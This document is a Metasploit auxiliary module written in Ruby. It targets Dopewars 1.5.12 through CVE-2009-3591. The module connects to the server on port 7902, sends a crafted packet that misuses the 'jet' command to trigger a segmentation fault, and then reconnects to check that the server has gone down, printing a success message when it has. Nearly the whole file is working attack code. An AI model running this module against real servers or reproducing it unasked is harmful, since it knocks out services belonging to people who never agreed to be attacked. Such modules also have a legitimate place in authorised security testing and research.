1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'English'
7
class MetasploitModule < Msf::Auxiliary
8
  include Msf::Exploit::Remote::Tcp
9
  include Msf::Auxiliary::Dos
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name'	=> 'Dopewars Denial of Service',
16
        'Description'	=> %q{
17
          The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to
18
          a lack of input validation.
19
        },
20
        'Author'	=> [ 'Doug Prostko <dougtko[at]gmail.com>' ],
21
        'License'	=> MSF_LICENSE,
22
        'References' => [
23
          [ 'CVE', '2009-3591' ],
24
          [ 'OSVDB', '58884' ],
25
          [ 'BID', '36606' ]
26
        ],
27
        'DisclosureDate' => '2009-10-05',
28
        'Notes' => {
29
          'Stability' => [CRASH_SERVICE_DOWN],
30
          'SideEffects' => [],
31
          'Reliability' => []
32
        }
33
      )
34
    )
35

36
    register_options([Opt::RPORT(7902)])
37
  end
38

39
  def run
40
    # The jet command is vulnerable.
41
    # Program received signal SIGSEGV, Segmentation fault.
42
    # [Switching to Thread 0xb74916c0 (LWP 30638)]
43
    # 0x08062f6e in HandleServerMessage (buf=0x8098828 "", Play=0x809a000) at
44
    # serverside.c:525
45
    # 525			dopelog(4, LF_SERVER, "%s jets to %s",
46
    #
47
    connect
48
    pkt = "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"
49
    print_status('Sending dos packet...')
50
    sock.put(pkt)
51
    disconnect
52

53
    print_status('Checking for success...')
54
    select(nil, nil, nil, 2)
55
    begin
56
      connect
57
    rescue ::Interrupt
58
      raise $ERROR_INFO
59
    rescue ::Rex::ConnectionRefused
60
      print_good('Dopewars server successfully shut down!')
61
    else
62
      print_error('DOS attack unsuccessful')
63
    ensure
64
      disconnect
65
    end
66
  end
67
end
68

69